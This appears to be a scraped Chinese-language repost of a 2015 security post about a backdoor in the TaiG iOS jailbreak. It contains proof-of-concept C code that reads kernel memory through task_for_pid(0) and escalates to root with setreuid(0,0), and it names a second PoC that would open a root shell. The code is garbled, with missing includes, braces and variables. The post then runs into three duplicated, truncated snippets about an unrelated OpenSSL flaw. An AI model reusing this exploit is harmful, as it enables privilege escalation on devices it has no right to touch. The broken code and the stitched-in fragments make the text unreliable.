路人甲 · 2015/07/01 19:05
漏洞重現演示如下圖:
示例一:通過test_taig_backdoor1
程式讀取核心記憶體
示例二:通過test_taig_backdoor2
獲得root許可權shell
test_taig_backdoor
讀取任意核心poc**:
#!c
#include #include #include #include #include #include #include #include void dump_kernel_memory(vm_address_t addr)
; int ret;
ret = task_for_pid(mach_task_self(), 0, &proc_task);
if (ret != 0)
nslog(@"task for pid 0 = %u", proc_task);
kret = vm_read_overwrite(proc_task,
addr,
sizeof(buffer),
(vm_address_t)buffer,
&ret_size);
char *info = malloc(4096);
info[0] = '\0';
for (i = 0; i < ret_size; i++)
nslog(@"%s", info);
free(info);
}int main (int argc, const char * ar**)
nslog(@"current uid=%d euid=%d", getuid(), geteuid());
/** taig backdoor test
*/setreuid(0,0);
nslog(@"now uid=%d euid=%d", getuid(), geteuid());
vm_address_t addr = strtoul(ar**[1], null, 16);
dump_kernel_memory(addr);
return 0;
}複製**
test_taig_backdoor2提權poc**:
#!c
void get_root_shell
複製**
#!c
void testbackdoor()
複製**
太極越獄ios8.0-8.1.1未能找到機器進行測試,可能也有此重大後門。
太極越獄與evad3rs的「緋聞」一直沒有間斷。據富比士報道(www.forbes.com/sites/thoma…)(mobile.163.com/15/0630/10/…), 太極曾支付evad3rs高達一百萬美金用於越獄合作開發,該合作的產物就是evasi0n7強制安裝「太極助手」的鬧劇。至於太極越獄的安全後門是「慣犯」還是「初犯」的謎底恐怕就無法揭開了。
安全協議不安全 OpenSSL現重大安全漏洞
2014年4月8日,微軟宣稱將不再為windows xp提供技術支援,當大多數人在憂慮如何保護個人電腦安全時,openssl卻爆出本年度最嚴重的安全漏洞!無論使用者電腦多麼安全,只要登陸的 使用了存在漏洞的openssl版本,就可能被黑客實時監控到登入賬號和密碼。openssl是什麼?ssl 安全套...
安全協議並不安全 OpenSSL出現重大安全漏洞
2014年4月8日,微軟宣稱將不再為windowsxp提供技術支援,當大多數人在憂慮如何保護個人電腦安全時,openssl卻爆出本年度最嚴重的安全漏洞!無論使用者電腦多麼安全,只要登陸的 使用了存在漏洞的openssl版本,就可能被黑客實時監控到登入賬號和密碼。openssl是什麼?ssl 安全套接...
安全協議並不安全 OpenSSL出現重大安全漏洞
2014年4月8日,微軟宣稱將不再為windows xp提供技術支援,當大多數人在憂慮如何保護個人電腦安全時,openssl卻爆出本年度最嚴重的安全漏洞!無論使用者電腦多麼安全,只要登陸的 使用了存在漏洞的openssl版本,就可能被黑客實時監控到登入賬號和密碼。openssl是什麼?ssl 安全套...